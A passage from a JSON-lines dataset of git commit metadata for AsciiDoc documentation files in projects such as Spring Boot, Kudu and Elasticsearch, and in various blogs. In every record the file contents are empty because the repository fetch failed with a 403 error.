2015-03-15-NEW-J5-Breakout-Board.adoc","repos":"modmaker\/modmaker.github.io,modmaker\/modmaker.github.io,modmaker\/modmaker.github.io","old_file":"_posts\/2015-03-15-NEW-J5-Breakout-Board.adoc","new_file":"_posts\/2015-03-15-NEW-J5-Breakout-Board.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/modmaker\/modmaker.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebc4065c8635c3acdfceebbc5aedceeb8736cc52","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c1efa473e73802fb9cd86616b16d41c1ec1dce3","subject":"Update documentation on how to configure the main class with Gradle","message":"Update documentation on how to configure the main class with Gradle\n\nIn 1.3, our Gradle plugin no longer automatically applies the\napplication plugin. This affects the default options that are\navailable for explicitly configuring a project's main class. This\ncommit updates the documentation accordingly.\n\nCloses gh-3768\n","repos":"yhj630520\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,drumonii\/spring-boot,jxblum\/spring-boot,chrylis\/spring-boot,bijukunjummen\/spring-boot,izeye\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot,royclarkson\/spring-boot,spring-projects\/spring-boot,felipeg48\/spring-boot,olivergierke\/spring-boot,spring-projects\/spring-boot,yangdd1205\/spring-boot,hello2009chen\/spring-boot,michael-simons\/spring-boot,mosoft521\/spring-boot,minmay\/spring-boot,pvorb\/spring-boot,spring-projects\/spring-boot,rweisleder\/spring-boot,candrews\/spring-boot,spring-projects\/spring-boot,lburgazzoli\/spring-boot,RichardCSantana\/spring-boot,shakuzen\/spring-boot,javyzheng\/spring-boot,DeezCashews\/spring-boot,bijukunjummen\/spring-boot,cleverjava\/jenkins2-course-spring-boot,ameraljovic\/spring-boot,vpavic\/spring-boot,lucassaldanha\/spring-boot,herau\/spring-boot,DeezCashews\/spring-boot,vpavic\/spring-boot,olivergierke\/spring-boot,htynkn\/spring-boot,mbogoevici\/spring-boot,qerub\/spring-boot,lexandro\/spring-boot,dreis2211\/spring-boot,neo4j-contrib\/spring-boot,joshthornhill\/spring-boot,lexandro\/spring-boot,ptahchiev\/spring-boot,Nowheresly\/spring-boot,isopov\/spring-boot,DeezCashews\/spring-boot,cleverjava\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,pvorb\/spring-boot,dreis2211\/spring-boot,yhj630520\/spring-boot,thomasdarimont\/spring-boot,bijukunjummen\/spring-boot,lexandro\/spring-boot,javyzheng\/spring-boot,vakninr\/spring-boot,jvz\/spring-boot,dfa1\/spring-boot,jmnarloch\/spring-boot,kdvolder\/spring-boot,jayarampradhan\/spring-boot,shangyi0102\/spring-boot,linead\/spring-boot,hqrt\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,sbcoba\/spring-boot,drumonii\/spring-boot,habuma\/spring-boot,hello2009chen\/spring-boot,chrylis\/spring-boot,zhanhb\/spring-boot,mbenson\/spring-boot,mbogoevici\/spring-boot,scottfrederick\/spring-boot,habuma\/spring-boot,SaravananParthasarathy\/SPS
Demo,linead\/spring-boot,qerub\/spring-boot,lenicliu\/spring-boot,joshthornhill\/spring-boot,felipeg48\/spring-boot,felipeg48\/spring-boot,lucassaldanha\/spring-boot,donhuvy\/spring-boot,mdeinum\/spring-boot,RichardCSantana\/spring-boot,nebhale\/spring-boot,shakuzen\/spring-boot,joshiste\/spring-boot,philwebb\/spring-boot-concourse,donhuvy\/spring-boot,dreis2211\/spring-boot,eddumelendez\/spring-boot,mdeinum\/spring-boot,yhj630520\/spring-boot,jmnarloch\/spring-boot,Nowheresly\/spring-boot,kdvolder\/spring-boot,tiarebalbi\/spring-boot,ihoneymon\/spring-boot,jayarampradhan\/spring-boot,hello2009chen\/spring-boot,drumonii\/spring-boot,thomasdarimont\/spring-boot,ilayaperumalg\/spring-boot,ameraljovic\/spring-boot,dfa1\/spring-boot,jbovet\/spring-boot,zhangshuangquan\/spring-root,ollie314\/spring-boot,vakninr\/spring-boot,cleverjava\/jenkins2-course-spring-boot,htynkn\/spring-boot,donhuvy\/spring-boot,tiarebalbi\/spring-boot,nebhale\/spring-boot,i007422\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,ilayaperumalg\/spring-boot,bclozel\/spring-boot,NetoDevel\/spring-boot,ptahchiev\/spring-boot,shangyi0102\/spring-boot,scottfrederick\/spring-boot,drumonii\/spring-boot,bclozel\/spring-boot,dfa1\/spring-boot,ilayaperumalg\/spring-boot,brettwooldridge\/spring-boot,neo4j-contrib\/spring-boot,joshthornhill\/spring-boot,ihoneymon\/spring-boot,ameraljovic\/spring-boot,lexandro\/spring-boot,mbogoevici\/spring-boot,joansmith\/spring-boot,bbrouwer\/spring-boot,sbcoba\/spring-boot,mbenson\/spring-boot,izeye\/spring-boot,aahlenst\/spring-boot,i007422\/jenkins2-course-spring-boot,zhanhb\/spring-boot,kdvolder\/spring-boot,tiarebalbi\/spring-boot,mbenson\/spring-boot,eddumelendez\/spring-boot,jxblum\/spring-boot,Buzzardo\/spring-boot,jvz\/spring-boot,izeye\/spring-boot,RichardCSantana\/spring-boot,vakninr\/spring-boot,aahlenst\/spring-boot,Buzzardo\/spring-boot,shakuzen\/spring-boot,hqrt\/jenkins2-course-spring-boot,joshiste\/spring-boot,mbogoevici\/spring-boot,eddumelendez\/spring-boot,bbrouwer\/spring-boot,ollie314\/spring-boot,dreis2211\/spring-boot,qerub\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,neo4j-contrib\/spring-boot,aahlenst\/spring-boot,habuma\/spring-boot,ptahchiev\/spring-boot,javyzheng\/spring-boot,sebastiankirsch\/spring-boot,ameraljovic\/spring-boot,xiaoleiPENG\/my-project,joansmith\/spring-boot,drumonii\/spring-boot,neo4j-contrib\/spring-boot,cleverjava\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,candrews\/spring-boot,SaravananParthasarathy\/SPSDemo,joshthornhill\/spring-boot,joansmith\/spring-boot,mbenson\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,lenicliu\/spring-boot,qerub\/spring-boot,lburgazzoli\/spring-boot,lenicliu\/spring-boot,philwebb\/spring-boot,NetoDevel\/spring-boot,brettwooldridge\/spring-boot,xiaoleiPENG\/my-project,isopov\/spring-boot,i007422\/jenkins2-course-spring-boot,lenicliu\/spring-boot,joshthornhill\/spring-boot,sebastiankirsch\/spring-boot,cleverjava\/jenkins2-course-spring-boot,kdvolder\/spring-boot,ihoneymon\/spring-boot,mrumpf\/spring-boot,kamilszymanski\/spring-boot,sebastiankirsch\/spring-boot,NetoDevel\/spring-boot,habuma\/spring-boot,ihoneymon\/spring-boot,ihoneymon\/spring-boot,tsachev\/spring-boot,RichardCSantana\/spring-boot,mrumpf\/spring-boot,deki\/spring-boot,shangyi0102\/spring-boot,spring-projects\/spring-boot,yhj630520\/spring-boot,jmnarloch\/spring-boot,DeezCashews\/spring-boot,joshiste\/spring-boot,philwebb\/spring-boot-concourse,Nowheresly\/spring-boot,philwebb\/spring-boot-concourse,mrumpf\/spring-boot,pvorb\/spring
-boot,brettwooldridge\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,afroje-reshma\/spring-boot-sample,ptahchiev\/spring-boot,wilkinsona\/spring-boot,Nowheresly\/spring-boot,hello2009chen\/spring-boot,philwebb\/spring-boot-concourse,jbovet\/spring-boot,jmnarloch\/spring-boot,minmay\/spring-boot,sbuettner\/spring-boot,bjornlindstrom\/spring-boot,sbcoba\/spring-boot,jvz\/spring-boot,akmaharshi\/jenkins,michael-simons\/spring-boot,royclarkson\/spring-boot,isopov\/spring-boot,candrews\/spring-boot,jbovet\/spring-boot,sbuettner\/spring-boot,sbcoba\/spring-boot,candrews\/spring-boot,afroje-reshma\/spring-boot-sample,dreis2211\/spring-boot,dreis2211\/spring-boot,scottfrederick\/spring-boot,akmaharshi\/jenkins,kamilszymanski\/spring-boot,bclozel\/spring-boot,shangyi0102\/spring-boot,afroje-reshma\/spring-boot-sample,rweisleder\/spring-boot,tiarebalbi\/spring-boot,kamilszymanski\/spring-boot,olivergierke\/spring-boot,royclarkson\/spring-boot,tsachev\/spring-boot,wilkinsona\/spring-boot,yhj630520\/spring-boot,mbenson\/spring-boot,jbovet\/spring-boot,zhanhb\/spring-boot,sbuettner\/spring-boot,candrews\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,minmay\/spring-boot,vpavic\/spring-boot,lexandro\/spring-boot,rweisleder\/spring-boot,zhanhb\/spring-boot,michael-simons\/spring-boot,javyzheng\/spring-boot,NetoDevel\/spring-boot,minmay\/spring-boot,sbcoba\/spring-boot,felipeg48\/spring-boot,ihoneymon\/spring-boot,philwebb\/spring-boot,lucassaldanha\/spring-boot,i007422\/jenkins2-course-spring-boot,deki\/spring-boot,zhangshuangquan\/spring-root,mosoft521\/spring-boot,dfa1\/spring-boot,jayarampradhan\/spring-boot,thomasdarimont\/spring-boot,aahlenst\/spring-boot,zhanhb\/spring-boot,mbogoevici\/spring-boot,sbuettner\/spring-boot,mbenson\/spring-boot,tsachev\/spring-boot,ameraljovic\/spring-boot,akmaharshi\/jenkins,bbrouwer\/spring-boot,nebhale\/spring-boot,bjornlindstrom\/spring-boot,yangdd1205\/spring-boot,joshiste\/spring-boot,joshiste\/spring-boot,pvorb\/spring-boot,jxblum\/spring-boot,sebastiankirsch\/spring-boot,michael-simons\/spring-boot,bjornlindstrom\/spring-boot,kamilszymanski\/spring-boot,donhuvy\/spring-boot,ilayaperumalg\/spring-boot,deki\/spring-boot,sbuettner\/spring-boot,nebhale\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,afroje-reshma\/spring-boot-sample,vpavic\/spring-boot,eddumelendez\/spring-boot,ptahchiev\/spring-boot,linead\/spring-boot,linead\/spring-boot,rweisleder\/spring-boot,tsachev\/spring-boot,deki\/spring-boot,Buzzardo\/spring-boot,sebastiankirsch\/spring-boot,lenicliu\/spring-boot,thomasdarimont\/spring-boot,jvz\/spring-boot,mdeinum\/spring-boot,isopov\/spring-boot,olivergierke\/spring-boot,qerub\/spring-boot,ilayaperumalg\/spring-boot,vpavic\/spring-boot,jmnarloch\/spring-boot,bbrouwer\/spring-boot,ilayaperumalg\/spring-boot,mdeinum\/spring-boot,xiaoleiPENG\/my-project,philwebb\/spring-boot,jvz\/spring-boot,kdvolder\/spring-boot,joansmith\/spring-boot,RichardCSantana\/spring-boot,thomasdarimont\/spring-boot,vakninr\/spring-boot,yangdd1205\/spring-boot,aahlenst\/spring-boot,kdvolder\/spring-boot,herau\/spring-boot,xiaoleiPENG\/my-project,javyzheng\/spring-boot,felipeg48\/spring-boot,chrylis\/spring-boot,joansmith\/spring-boot,bjornlindstrom\/spring-boot,SaravananParthasarathy\/SPSDemo,rajendra-chola\/jenkins2-course-spring-boot,scottfrederick\/spring-boot,izeye\/spring-boot,jbovet\/spring-boot,spring-projects\/spring-boot,scottfrederick\/spring-boot,pvorb\/spring-boot,lburgazzoli\/spring-boot,hello2009chen\/spring-boot,bijuk
unjummen\/spring-boot,joshiste\/spring-boot,chrylis\/spring-boot,vakninr\/spring-boot,eddumelendez\/spring-boot,hqrt\/jenkins2-course-spring-boot,minmay\/spring-boot,aahlenst\/spring-boot,chrylis\/spring-boot,xiaoleiPENG\/my-project,zhanhb\/spring-boot,nebhale\/spring-boot,afroje-reshma\/spring-boot-sample,Nowheresly\/spring-boot,hqrt\/jenkins2-course-spring-boot,herau\/spring-boot,mosoft521\/spring-boot,vpavic\/spring-boot,bijukunjummen\/spring-boot,mrumpf\/spring-boot,philwebb\/spring-boot-concourse,ollie314\/spring-boot,mosoft521\/spring-boot,olivergierke\/spring-boot,SaravananParthasarathy\/SPSDemo,tsachev\/spring-boot,kamilszymanski\/spring-boot,philwebb\/spring-boot,hqrt\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,bclozel\/spring-boot,wilkinsona\/spring-boot,dfa1\/spring-boot,habuma\/spring-boot,SaravananParthasarathy\/SPSDemo,donhuvy\/spring-boot,drumonii\/spring-boot,mrumpf\/spring-boot,mdeinum\/spring-boot,royclarkson\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,htynkn\/spring-boot,jxblum\/spring-boot,shakuzen\/spring-boot,chrylis\/spring-boot,ollie314\/spring-boot,zhangshuangquan\/spring-root,htynkn\/spring-boot,NetoDevel\/spring-boot,deki\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,tsachev\/spring-boot,DeezCashews\/spring-boot,jayarampradhan\/spring-boot,jxblum\/spring-boot,akmaharshi\/jenkins,felipeg48\/spring-boot,htynkn\/spring-boot,jayarampradhan\/spring-boot,philwebb\/spring-boot,eddumelendez\/spring-boot,jxblum\/spring-boot,lucassaldanha\/spring-boot,brettwooldridge\/spring-boot,tiarebalbi\/spring-boot,scottfrederick\/spring-boot,neo4j-contrib\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,michael-simons\/spring-boot,lucassaldanha\/spring-boot,rweisleder\/spring-boot,isopov\/spring-boot,Buzzardo\/spring-boot,mdeinum\/spring-boot,izeye\/spring-boot,michael-simons\/spring-boot,royclarkson\/spring-boot,ptahchiev\/spring-boot,wilkinsona\/spring-boot,isopov\/spring-boot,rweisleder\/spring-boot,herau\/spring-boot,wilkinsona\/spring-boot,htynkn\/spring-boot,herau\/spring-boot,akmaharshi\/jenkins,linead\/spring-boot,brettwooldridge\/spring-boot,mosoft521\/spring-boot,bclozel\/spring-boot,bjornlindstrom\/spring-boot,shakuzen\/spring-boot,Buzzardo\/spring-boot,ollie314\/spring-boot,bclozel\/spring-boot,zhangshuangquan\/spring-root,donhuvy\/spring-boot,zhangshuangquan\/spring-root,habuma\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/build-tool-plugins.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/build-tool-plugins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fc55bceee8eaaf853287769328815ff54445db5f","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"3a0f1177c5363a91fd67146cab76eab0c9527682","subject":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","message":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"959c1a360fba51c5ce7458cd95878681f56baf98","subject":"update release notes","message":"update release notes\n","repos":"jboss-openshift\/application-templates,bparees\/application-templates,knrc\/application-templates,rnetuka\/application-templates,josefkarasek\/application-templates,errantepiphany\/application-templates,bdecoste\/application-templates,rcernich\/application-templates,kyguy\/application-templates,douglaspalmer\/application-templates","old_file":"docs\/release-notes.adoc","new_file":"docs\/release-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jboss-openshift\/application-templates.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c9e3bd846d6d0403c688a8e7d178f31966a3bfd3","subject":"[docs] Add scaling guide","message":"[docs] Add scaling guide\n\nThis adds some more detailed information on how Kudu scales w.r.t\nseveral resources and provides some background on the scale limits\nand how to plan capacity for a Kudu deployment.\n\nChange-Id: I38d8999addc41fe0b726342a27dbba199ddf7dd2\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8842\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\nTested-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu","old_file":"docs\/scaling_guide.adoc","new_file":"docs\/scaling_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e61224778f306d9dd4c9c5d9e67fe3cf7aef82a6","subject":"Fixed bad link","message":"Fixed bad link\n\nOriginal commit: 
elastic\/x-pack-elasticsearch@f7ab965eba51e07b7a2718344cd670bef4a7026b\n","repos":"nknize\/elasticsearch,vroyer\/elassandra,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,strapdata\/elassandra,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,uschindler\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch","old_file":"docs\/en\/watcher\/example-watches\/example-watch-clusterstatus.asciidoc","new_file":"docs\/en\/watcher\/example-watches\/example-watch-clusterstatus.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8d810742b6a44c627860045be67f489b45ab880e","subject":"add bdx.io slide","message":"add bdx.io slide\n","repos":"binout\/asciidoctor-quickie,binout\/asciidoctor-quickie,binout\/asciidoctor-quickie,binout\/asciidoctor-quickie,binout\/asciidoctor-quickie","old_file":"src\/main\/slides\/asciidoctor-bdx-io.adoc","new_file":"src\/main\/slides\/asciidoctor-bdx-io.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/asciidoctor-quickie.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c2d7623aa1d7b73bbd737e5c0ebf78b071dd36b","subject":"Add code climate badge","message":"Add code climate badge\n","repos":"archiloque\/external-memory,archiloque\/external-memory,archiloque\/external-memory","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/archiloque\/external-memory.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f881b1b6fdbffae3ff73574d2d4e246d2f911f0","subject":"Add a README file.","message":"Add a README file.\n\nIt is written in AsciiDoc because of its support for tables.\n","repos":"marcecj\/scons_faust","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marcecj\/scons_faust.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26f64e041d170593bb64deee68a17b3e6c1bf5fe","subject":"Updated current job activities","message":"Updated current job 
activities\n\nSigned-off-by: Dan Mack <f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"workhist.adoc","new_file":"workhist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11900ae4f6687badb88dba831e2a8dc82e12abca","subject":"initial","message":"initial","repos":"tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,tdefilip\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/StrafePingMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/StrafePingMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rdkgit\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"51f9977417d754dbac2f50b78c015d9add9f35f3","subject":"Update 2016-04-16-Vuejs-A-Lightweight-Alternative-to-Angular-J-S.adoc","message":"Update 2016-04-16-Vuejs-A-Lightweight-Alternative-to-Angular-J-S.adoc","repos":"Lukas238\/the-holodeck,Lukas238\/the-holodeck,Lukas238\/the-holodeck,Lukas238\/the-holodeck","old_file":"_posts\/2016-04-16-Vuejs-A-Lightweight-Alternative-to-Angular-J-S.adoc","new_file":"_posts\/2016-04-16-Vuejs-A-Lightweight-Alternative-to-Angular-J-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lukas238\/the-holodeck.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"519b5460a63df0e85cf9144c40cbd98884478a3a","subject":"Update 2016-03-20-douleurs-extremes-atterrissage-avion.adoc","message":"Update 2016-03-20-douleurs-extremes-atterrissage-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-douleurs-extremes-atterrissage-avion.adoc","new_file":"_posts\/2016-03-20-douleurs-extremes-atterrissage-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6afa538eeb6fa1d29a1991699f1407c30e2a84a2","subject":"Update 2017-05-31-How-IIS-Bindings-work-in-Azure-App-Service-and-Cloud-Service.adoc","message":"Update 
2017-05-31-How-IIS-Bindings-work-in-Azure-App-Service-and-Cloud-Service.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-05-31-How-IIS-Bindings-work-in-Azure-App-Service-and-Cloud-Service.adoc","new_file":"_posts\/2017-05-31-How-IIS-Bindings-work-in-Azure-App-Service-and-Cloud-Service.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ae11092d83fb3e443653dcf1401be72499d34b5","subject":"Update 2015-07-23-Implementacion-de-pantalla-para-introduccion-de-Trabajos-CRUD.adoc","message":"Update 2015-07-23-Implementacion-de-pantalla-para-introduccion-de-Trabajos-CRUD.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-07-23-Implementacion-de-pantalla-para-introduccion-de-Trabajos-CRUD.adoc","new_file":"_posts\/2015-07-23-Implementacion-de-pantalla-para-introduccion-de-Trabajos-CRUD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08b76d95ca5a8d199e30400f2b7f4842a1345728","subject":"Update 2017-06-16-Asynchronous-Programming-async-await-Configure-Await-deadlock.adoc","message":"Update 2017-06-16-Asynchronous-Programming-async-await-Configure-Await-deadlock.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-06-16-Asynchronous-Programming-async-await-Configure-Await-deadlock.adoc","new_file":"_posts\/2017-06-16-Asynchronous-Programming-async-await-Configure-Await-deadlock.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d39f4c27ff8f6645e99800c036cd682fe5cab0b","subject":"Update 2018-07-05-Dart1.adoc","message":"Update 2018-07-05-Dart1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-05-Dart1.adoc","new_file":"_posts\/2018-07-05-Dart1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce57ac43e55ed4cc87d3177b16cfa2072f6cb75b","subject":"How to use Pandas with Hawkular-Metrics (#280)","message":"How to use Pandas with Hawkular-Metrics (#280)\n\n* How to use Pandas with Hawkular-Metrics\r\n\r\n* Fix 
